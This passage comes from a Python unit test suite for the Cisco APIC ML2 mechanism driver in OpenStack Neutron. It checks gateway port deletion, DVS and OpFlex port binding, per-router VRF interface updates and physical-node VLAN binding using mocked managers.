if self.driver.per_tenant_context:
if self.driver.single_tenant_mode:
shadow_l3out = (
"Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
tenant='t1'))
else:
shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
mgr.delete_external_routed_network.assert_called_once_with(
shadow_l3out,
owner=self._tenant(ext_nat=True, neutron_tenant='t1'))
else:
self.assertFalse(mgr.delete_external_routed_network.called)
exp_calls = [
mock.call(shadow_l3out,
'contract-r2',
external_epg=shadow_ext_epg,
owner=self._tenant(ext_nat=True), provided=True),
mock.call(shadow_l3out,
'contract-r2',
external_epg=shadow_ext_epg,
owner=self._tenant(ext_nat=True), provided=False)
]
self._check_call_list(
exp_calls, mgr.unset_contract_for_external_epg.call_args_list)
del gw_ports[0]
# Delete third GW port
mgr.unset_contract_for_external_epg.reset_mock()
mgr.delete_external_routed_network.reset_mock()
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT + 'r3')
self.driver.delete_port_postcommit(gw_ports[0])
vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
if self.driver.vrf_per_router_tenants else '')
if self.driver.single_tenant_mode and self.driver.per_tenant_context:
shadow_l3out = (
"Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
tenant='t2'))
else:
shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
mgr.delete_external_routed_network.assert_called_once_with(
shadow_l3out, owner=self._tenant(ext_nat=True,
neutron_tenant='t2'))
def test_delete_gw_port_multiple_postcommit(self):
self._test_delete_gw_port_multiple_postcommit(pre=False)
def test_delete_pre_gw_port_multiple_postcommit(self):
self._test_delete_gw_port_multiple_postcommit(pre=True)
def _test_delete_no_nat_gw_port_multiple_postcommit(self, pre):
ext_net_name = mocked.APIC_NETWORK_NO_NAT
if pre:
self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
'preexisting'] = 'True'
net_ctx = self._get_network_context(mocked.APIC_TENANT,
ext_net_name,
TEST_SEGMENT1, external=True)
gw_ports = self._setup_multiple_routers(ext_net_name, net_ctx)
mgr = self.driver.apic_manager
l3out = net_ctx.current['name'] if pre else ext_net_name
if pre:
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': self._tenant()}
# Delete first GW port
self.driver.delete_port_postcommit(gw_ports[0])
self.assertFalse(mgr.set_context_for_external_routed_network.called)
del gw_ports[0]
# delete second GW port
self.driver.delete_port_postcommit(gw_ports[0])
if self.driver.single_tenant_mode:
l3out = self._scoped_name(
net_ctx.current['name'] if pre else ext_net_name,
preexisting=pre)
if self.driver.per_tenant_context:
mgr.set_context_for_external_routed_network.assert_called_with(
self._tenant(), l3out, None, transaction=mock.ANY)
else:
self.assertFalse(
mgr.set_context_for_external_routed_network.called)
del gw_ports[0]
# delete third GW port
mgr.set_context_for_external_routed_network.reset_mock()
self.driver.delete_port_postcommit(gw_ports[0])
mgr.set_context_for_external_routed_network.assert_called_with(
self._tenant(), l3out, None, transaction=mock.ANY)
def test_delete_no_nat_gw_port_multiple_postcommit(self):
self._test_delete_no_nat_gw_port_multiple_postcommit(False)
def test_delete_no_nat_pre_gw_port_multiple_postcommit(self):
self._test_delete_no_nat_gw_port_multiple_postcommit(True)
def test_no_nat_compute_port_precommit_exception(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1)
self.assertRaises(md.VMsDisallowedOnExtNetworkIfNatDisabled,
self.driver.create_port_precommit,
port_ctx)
def test_edge_nat_compute_port_precommit_exception(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
'vm1', net_ctx, HOST_ID1)
self.assertRaises(md.VMsDisallowedOnExtNetworkIfEdgeNat,
self.driver.create_port_precommit,
port_ctx)
def _get_network_context(self, tenant_id, net_id, seg_id=None,
seg_type='vlan', external=False, shared=False,
route_leak=False):
network = {'id': net_id,
'name': net_id + '-name',
'tenant_id': tenant_id,
'provider:segmentation_id': seg_id,
'provider:network_type': seg_type,
'shared': shared}
if external:
network['router:external'] = True
if seg_id:
network_segments = [{'id': seg_id,
'segmentation_id': ENCAP,
'network_type': seg_type,
'physical_network': 'physnet1'}]
else:
network_segments = []
if route_leak:
network[ALLOW_ROUTE_LEAK] = True
return FakeNetworkContext(network, network_segments)
def _get_subnet_context(self, gateway_ip, cidr, network):
subnet = {'tenant_id': network.current['tenant_id'],
'network_id': network.current['id'],
'id': '[%s/%s]' % (gateway_ip, cidr),
'gateway_ip': gateway_ip,
'cidr': cidr}
return FakeSubnetContext(subnet, network)
def _get_port_context(self, tenant_id, net_id, vm_id, network_ctx, host,
gw=False, device_owner='compute:nova',
router_owner=None, interface=False):
port = {'device_id': vm_id,
'device_owner': device_owner,
'binding:host_id': host,
'binding:vif_type': 'unbound' if not host else 'ovs',
'tenant_id': tenant_id,
'id': mocked.APIC_PORT,
'name': mocked.APIC_PORT,
'network_id': net_id,
'fixed_ips': [{'subnet_id': 'some_id',
'ip_address': '3.3.3.1'}]}
if gw:
port['device_owner'] = n_constants.DEVICE_OWNER_ROUTER_GW
port['device_id'] = router_owner or mocked.APIC_ROUTER
if interface:
port['device_owner'] = n_constants.DEVICE_OWNER_ROUTER_INTF
port['device_id'] = router_owner or mocked.APIC_ROUTER
return FakePortContext(port, network_ctx)
def test_keystone_notification_endpoint(self):
self.driver.name_mapper.aci_mapper.is_tenant_in_apic = mock.Mock(
return_value=True)
payload = {}
payload['resource_info'] = mocked.APIC_TENANT
keystone_ep = md.KeystoneNotificationEndpoint(self.driver)
keystone_ep.info(None, None, None, payload, None)
mgr = self.driver.apic_manager
if self.driver.single_tenant_mode:
mgr.update_name_alias.assert_called_once_with(
mgr.apic.fvAp, self._tenant(), self._app_profile(),
nameAlias='new_name')
else:
mgr.update_name_alias.assert_called_once_with(
mgr.apic.fvTenant, self._tenant(), nameAlias='new_name')
class ApicML2IntegratedTestCaseDvs(ApicML2IntegratedTestBase):
def setUp(self, service_plugins=None):
ml2_opts = {
'mechanism_drivers': ['openvswitch', 'cisco_apic_ml2'],
'tenant_network_types': ['opflex'],
'type_drivers': ['opflex'],
}
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseDvs, self).setUp(
service_plugins, ml2_opts=ml2_opts)
# This is required for the test. Without it,
# the ML2 driver's agent_type ends up being a
# mocked type, which fails when passed to the
# hast_agents() method for the PortContext
# (but only for types not defined by the
# mechanism driver class itself).
self.driver.agent_type = ofcst.AGENT_TYPE_OPFLEX_OVS
self.driver._dvs_notifier = mock.MagicMock()
self.driver.dvs_notifier.bind_port_call = mock.Mock(
return_value={'key': BOOKED_PORT_VALUE})
def _verify_dvs_notifier(self, notifier, port, host):
# can't use getattr() with mock, so use eval instead
try:
dvs_mock = eval('self.driver.dvs_notifier.' + notifier)
except Exception:
self.assertTrue(False,
"The method " + notifier + " was not called")
return
self.assertTrue(dvs_mock.called)
a1, a2, a3, a4 = dvs_mock.call_args[0]
self.assertEqual(a1['id'], port['id'])
self.assertEqual(a2['id'], port['id'])
self.assertEqual(a4, host)
def _get_expected_pg(self, net):
if self.driver.single_tenant_mode:
return (self.driver.single_tenant_name + '|' +
net['tenant_id'] + '|' + net['id'])
else:
return (net['tenant_id'] + '|' +
mocked.APIC_SYSTEM_ID + '|' + net['id'])
def test_bind_port_dvs(self):
# Register a DVS agent
self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
pg = newp1['port']['binding:vif_details']['dvs_port_group_name']
self.assertEqual(pg, expected_pg)
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h1')
def test_bind_port_dvs_with_opflex_diff_hosts(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1')
self._register_agent('h2', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h2')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
vif_det = newp1['port']['binding:vif_details']
self.assertIsNotNone(vif_det.get('dvs_port_group_name', None))
self.assertEqual(expected_pg, vif_det.get('dvs_port_group_name'))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h2')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h2')
def test_bind_ports_opflex_same_host(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1')
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
vif_det = newp1['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock = self.driver.dvs_notifier.update_postcommit_port_call
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
self.driver.dvs_notifier.reset_mock()
with self.port(subnet=sub, tenant_id='onetenant') as p2:
p2 = p2['port']
self.assertEqual(net['id'], p2['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp2 = self._bind_dhcp_port_to_host(p2['id'], 'h1')
# Called on the network's tenant
vif_det = newp2['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp2['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp2['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
def test_bind_ports_dvs_with_opflex_same_host(self):
# Register an OpFlex agent and DVS agent
self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=False,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
# Bind a VLAN port after registering a DVS agent
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
vif_det = newp1['port']['binding:vif_details']
self.assertIsNotNone(vif_det.get('dvs_port_group_name', None))
self.assertEqual(expected_pg, vif_det.get('dvs_port_group_name'))
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h1')
self.driver.dvs_notifier.reset_mock()
with self.port(subnet=sub, tenant_id='onetenant') as p2:
p2 = p2['port']
self.assertEqual(net['id'], p2['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp2 = self._bind_dhcp_port_to_host(p2['id'], 'h1')
# Called on the network's tenant
vif_det = newp2['port']['binding:vif_details']
self.assertIsNone(vif_det.get('dvs_port_group_name', None))
port_key = newp2['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNone(port_key)
dvs_mock = self.driver.dvs_notifier.update_postcommit_port_call
dvs_mock.assert_not_called()
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp2['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
dvs_mock = self.driver.dvs_notifier.delete_port_call
dvs_mock.assert_not_called()
def test_bind_port_dvs_shared(self):
# Register a DVS agent
self._register_agent('h1', agent_cfg=AGENT_CONF_DVS)
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
self.mgr.ensure_path_created_for_port = mock.Mock()
# Bind port to trigger path binding
newp1 = self._bind_port_to_host(p1['id'], 'h1')
# Called on the network's tenant
expected_pg = self._get_expected_pg(net)
pg = newp1['port']['binding:vif_details']['dvs_port_group_name']
self.assertEqual(pg, expected_pg)
port_key = newp1['port']['binding:vif_details'].get('dvs_port_key')
self.assertIsNotNone(port_key)
self.assertEqual(port_key, BOOKED_PORT_VALUE)
self._verify_dvs_notifier('update_postcommit_port_call', p1, 'h1')
net_ctx = FakeNetworkContext(net, [{'network_type': 'opflex'}])
port_ctx = FakePortContext(newp1['port'], net_ctx)
self.driver.delete_port_postcommit(port_ctx)
self._verify_dvs_notifier('delete_port_call', p1, 'h1')
class ApicML2IntegratedTestCaseDvsSingleTenantMode(
ApicML2IntegratedTestCaseDvs):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseDvsSingleTenantMode, self).setUp()
class ApicML2IntegratedTestCaseDvsSingleTenantModeWithName(
ApicML2IntegratedTestCaseDvs):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
self.override_conf('single_tenant_name', "singleTenantName",
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseDvsSingleTenantModeWithName,
self).setUp()
class ApicML2IntegratedTestCaseSingleVRF(ApicML2IntegratedTestCase):
def setUp(self, service_plugins=None):
super(ApicML2IntegratedTestCaseSingleVRF, self).setUp(service_plugins)
self.driver.per_tenant_context = True
def test_add_router_interface_on_shared_net_by_subnet(self):
pass
def test_add_router_interface_on_shared_net_by_port(self):
pass
def test_inter_tenant_router_interface_disallowed(self):
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True,
tenant_id='anothertenant')
router = self.create_router(api=self.ext_api,
expected_res_status=201)['router']
self.l3_plugin.per_tenant_context = True
# Per subnet
self.assertRaises(
driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext,
self.l3_plugin.add_router_interface, context.get_admin_context(),
router['id'], {'subnet_id': sub['subnet']['id']})
# Per port
with self.port(subnet=sub, tenant_id='anothertenant') as p1:
self.assertRaises(
driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext,
self.l3_plugin.add_router_interface,
context.get_admin_context(), router['id'],
{'port_id': p1['port']['id']})
def test_vrf_per_router_intf_update(self):
self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
net = self.create_network(tenant_id=mocked.APIC_TENANT)['network']
sub1 = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
tenant_id=mocked.APIC_TENANT, ip_version=4)
sub2 = self.create_subnet(
network_id=net['id'], cidr='192.168.1.0/24',
tenant_id=mocked.APIC_TENANT, ip_version=4)
net1 = self.create_network(tenant_id=mocked.APIC_TENANT)['network']
sub3 = self.create_subnet(
network_id=net1['id'], cidr='192.168.2.0/24',
tenant_id=mocked.APIC_TENANT, ip_version=4)
net_route_leak = self.create_network(
tenant_id=mocked.APIC_TENANT,
**{'apic:allow_route_leak': 'True'})['network']
sub_route_leak = self.create_subnet(
network_id=net_route_leak['id'], cidr='192.168.96.0/24',
tenant_id=mocked.APIC_TENANT, ip_version=4)
router = self.create_router(api=self.ext_api,
tenant_id=mocked.APIC_TENANT)['router']
with self.port(subnet=sub1,
fixed_ips=[{'subnet_id': sub1['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p1 = p['port']
with self.port(subnet=sub1,
fixed_ips=[{'subnet_id': sub1['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p1_1 = p['port']
with self.port(subnet=sub2,
fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p2 = p['port']
with self.port(subnet=sub2,
fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p2_1 = p['port']
with self.port(subnet=sub3,
fixed_ips=[{'subnet_id': sub3['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p3 = p['port']
with self.port(subnet=sub3,
fixed_ips=[{'subnet_id': sub3['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p3_1 = p['port']
with self.port(subnet=sub_route_leak,
fixed_ips=[{'subnet_id':
sub_route_leak['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p_route_leak = p['port']
with self.port(subnet=sub_route_leak,
fixed_ips=[{'subnet_id':
sub_route_leak['subnet']['id']}],
tenant_id=mocked.APIC_TENANT) as p:
p_route_leak_1 = p['port']
self.mgr.add_router_interface = mock.Mock()
self.driver.notifier.port_update = mock.Mock()
self._register_agent('h1')
self._bind_port_to_host(p1['id'], 'h1')
self._bind_port_to_host(p1_1['id'], 'h1')
self._bind_port_to_host(p_route_leak['id'], 'h1')
self._bind_port_to_host(p_route_leak_1['id'], 'h1')
self._register_agent('h2')
self._bind_port_to_host(p2['id'], 'h2')
self._bind_port_to_host(p2_1['id'], 'h2')
self._bind_port_to_host(p3['id'], 'h2')
self._bind_port_to_host(p3_1['id'], 'h2')
notified_p1_id = sorted([p1, p1_1])[0]['id']
notified_p2_id = sorted([p2, p2_1])[0]['id']
notified_p3_id = sorted([p3, p3_1])[0]['id']
notified_p_route_leak_id = sorted([p_route_leak,
p_route_leak_1])[0]['id']
ctx = context.Context(user_id=None, tenant_id=mocked.APIC_TENANT)
self.l3_plugin.add_router_interface(
ctx, router['id'], {'subnet_id': sub3['subnet']['id']})
self.driver.notifier.port_update.reset_mock()
self.l3_plugin.add_router_interface(
ctx, router['id'], {'subnet_id': sub1['subnet']['id']})
updates = sorted(set(
[pt[0][1]['id']
for pt in self.driver.notifier.port_update.call_args_list]))
self.assertEqual(sorted([notified_p1_id, notified_p2_id,
notified_p3_id, notified_p_route_leak_id]),
updates)
self.driver.notifier.port_update.reset_mock()
self.l3_plugin.remove_router_interface(
ctx, router['id'], {'subnet_id': sub1['subnet']['id']})
updates = sorted(set(
[pt[0][1]['id']
for pt in self.driver.notifier.port_update.call_args_list]))
self.assertEqual(sorted([notified_p1_id, notified_p2_id,
notified_p3_id, notified_p_route_leak_id]),
updates)
class ApicML2IntegratedTestCaseSingleTenant(ApicML2IntegratedTestCase):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseSingleTenant, self).setUp(
service_plugins)
class ApicML2IntegratedTestCaseSingleTenantWithName(ApicML2IntegratedTestCase):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
self.override_conf('single_tenant_name', "singleTenantName",
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseSingleTenantWithName, self).setUp(
service_plugins)
class ApicML2IntegratedTestCaseSingleTenantSingleContext(
ApicML2IntegratedTestCaseSingleVRF):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseSingleTenantSingleContext,
self).setUp(service_plugins)
class ApicML2IntegratedTestCaseSingleTenantWithNameSingleContext(
ApicML2IntegratedTestCaseSingleVRF):
def setUp(self, service_plugins=None):
self.override_conf('single_tenant_mode', True,
'ml2_cisco_apic')
self.override_conf('single_tenant_name', "singleTenantName",
'ml2_cisco_apic')
super(ApicML2IntegratedTestCaseSingleTenantWithNameSingleContext,
self).setUp(service_plugins)
class TestApicML2IntegratedPhysicalNode(ApicML2IntegratedTestBase):
def setUp(self, mech_drivers=None, service_plugins=None):
ml2_opts = {
'mechanism_drivers': mech_drivers or ['cisco_apic_ml2'],
'tenant_network_types': ['opflex'],
'type_drivers': ['opflex', 'vlan'],
}
super(TestApicML2IntegratedPhysicalNode, self).setUp(
service_plugins=service_plugins, ml2_opts=ml2_opts)
self.driver.agent_type = ofcst.AGENT_TYPE_OPFLEX_OVS
self.driver.apic_manager.phy_net_dict = {
'physnet1': {'hosts': set(['fw-app-01', 'lb-app-01'])}}
self.mgr.ensure_path_created_for_port = mock.Mock()
self.mgr.ensure_path_deleted_for_port = mock.Mock()
self.mgr.ensure_subnet_created_on_apic = mock.Mock()
self._register_agent('fw-app-01')
self._register_agent('lb-app-01')
self.expected_bound_driver = 'cisco_apic_ml2'
def _get_bound_seg(self, port_id):
port_context = self.plugin.get_bound_port_context(
context.get_admin_context(), port_id)
if port_context:
driver = (port_context.binding_levels[-1]['bound_driver']
if port_context.binding_levels else None)
return port_context.bottom_bound_segment, driver
def _query_dynamic_seg(self, network_id):
return ml2_db.get_network_segments(
context.get_admin_context().session, network_id,
filter_dynamic=True)
def test_phys_port_on_shared_public_opflex_network(self):
old_net_dict = self.driver.apic_manager.ext_net_dict
self.driver.apic_manager.ext_net_dict = self.external_network_dict
self.driver.apic_optimized_dhcp_lease_time = 100
self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
net = self.create_network(
name=mocked.APIC_NETWORK_HOST_SNAT + '-name',
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True, **{'router:external': 'True'})['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.12.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='onetenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'fw-app-01')
self.driver._add_ip_mapping_details = mock.Mock()
# Called on the network's tenant
self.mgr.ensure_path_created_for_port.assert_called_once_with(
'common', 'EXT-epg-network-host-snat-name_' + net['id'][:4],
'fw-app-01', mock.ANY, transaction=mock.ANY,
bd_name='EXT-bd-network-host-snat-name_' + net['id'][:4],
app_profile_name=self._app_profile(neutron_tenant='onetenant'))
self.driver.apic_manager.ext_net_dict = old_net_dict
def test_physical_bind(self):
tenant1 = self._tenant(neutron_tenant='onetenant')
app_prof1 = self._app_profile(neutron_tenant='onetenant')
self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
net1 = self.create_network(tenant_id='onetenant',
expected_res_status=201)['network']
sub1 = self.create_subnet(
network_id=net1['id'], cidr='192.168.0.0/24',
is_admin_context=True, ip_version=4)
with self.port(subnet=sub1, tenant_id='onetenant') as p:
p1 = p['port']
# bind to VM-host
self._bind_port_to_host(p1['id'], 'h1')
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual(bseg_p1['network_type'], 'opflex')
self.assertEqual('cisco_apic_ml2', bdriver)
self.mgr.ensure_path_created_for_port.assert_not_called()
# bind to one physical node
self._bind_port_to_host(p1['id'], 'fw-app-01')
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual(bseg_p1['network_type'], 'vlan')
self.assertEqual(self.expected_bound_driver, bdriver)
self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
self.mgr.ensure_path_created_for_port.assert_called_once_with(
tenant1, net1['id'], 'fw-app-01', bseg_p1['segmentation_id'],
bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
self.mgr.ensure_path_created_for_port.reset_mock()
# bind another physical node to same network, then delete that port
with self.port(subnet=sub1, tenant_id='onetenant') as p1_1:
p1_1 = p1_1['port']
self._bind_port_to_host(p1_1['id'], 'lb-app-01')
self.assertEqual(bseg_p1, self._get_bound_seg(p1_1['id'])[0])
self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
self.mgr.ensure_path_created_for_port.assert_called_once_with(
tenant1, net1['id'], 'lb-app-01', bseg_p1['segmentation_id'],
bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
self.delete_port(p1_1['id'], tenant_id=p1_1['tenant_id'])
self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
tenant1, net1['id'], 'lb-app-01', app_profile_name=app_prof1)
self.mgr.ensure_path_created_for_port.reset_mock()
self.mgr.ensure_path_deleted_for_port.reset_mock()
# bind p1 back to VM-host
self._bind_port_to_host(p1['id'], 'h1')
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual('cisco_apic_ml2', bdriver)
self.assertEqual(bseg_p1['network_type'], 'opflex')
self.assertEqual(0, len(self._query_dynamic_seg(net1['id'])))
self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
tenant1, net1['id'], 'fw-app-01', app_profile_name=app_prof1)
self.mgr.ensure_path_deleted_for_port.reset_mock()
def test_physical_bind_multiple_network(self):
tenant1 = self._tenant(neutron_tenant='onetenant')
app_prof1 = self._app_profile(neutron_tenant='onetenant')
net1 = self.create_network(tenant_id='onetenant',
expected_res_status=201)['network']
sub1 = self.create_subnet(
network_id=net1['id'], cidr='192.168.0.0/24',
is_admin_context=True, ip_version=4)
net2 = self.create_network(tenant_id='onetenant',
expected_res_status=201)['network']
sub2 = self.create_subnet(
network_id=net2['id'], cidr='192.168.0.0/24',
is_admin_context=True, ip_version=4)
with self.port(subnet=sub1, tenant_id='onetenant') as p:
p1 = p['port']
with self.port(subnet=sub2, tenant_id='onetenant') as p:
p2 = p['port']
self._bind_port_to_host(p1['id'], 'fw-app-01')
bseg_p1, bdriver = self._get_bound_seg(p1['id'])
self.assertEqual(self.expected_bound_driver, bdriver)
self.mgr.ensure_path_created_for_port.assert_called_once_with(
tenant1, net1['id'], 'fw-app-01', bseg_p1['segmentation_id'],
app_profile_name=app_prof1, bd_name=None, transaction=mock.ANY)
self.mgr.ensure_path_created_for_port.reset_mock()
# bind port from another network to first physical node
self._bind_port_to_host(p2['id'], 'fw-app-01')
bseg_p2, bdriver = self._get_bound_seg(p2['id'])
self.assertEqual(self.expected_bound_driver, bdriver)
self.assertEqual(bseg_p2['network_type'], 'vlan')
self.assertNotEqual(bseg_p1['segmentation_id'],
bseg_p2['segmentation_id'])
self.assertEqual(1, len(self._query_dynamic_seg(net2['id'])))
self.mgr.ensure_path_created_for_port.assert_called_once_with(
tenant1, net2['id'], 'fw-app-01', bseg_p2['segmentation_id'],
bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
# delete the ports
self.delete_port(p1['id'], tenant_id=p1['tenant_id'])
self.assertEqual(0, len(self._query_dynamic_seg(net1['id'])))
self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
tenant1, net1['id'], 'fw-app-01', app_profile_name=app_prof1)
self.mgr.ensure_path_deleted_for_port.reset_mock()
self.delete_port(p2['id'], tenant_id=p2['tenant_id'])
self.assertEqual(0, len(self._query_dynamic_seg(net2['id'])))
self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
tenant1, net2['id'], 'fw-app-01', app_profile_name=app_prof1)
self.mgr.ensure_path_deleted_for_port.reset_mock()
class TestApicML2IntegratedPhysicalNodeMultiDriver(
TestApicML2IntegratedPhysicalNode):
def setUp(self, service_plugins=None):
super(TestApicML2IntegratedPhysicalNodeMultiDriver, self).setUp(
mech_drivers=['openvswitch', 'cisco_apic_ml2'],
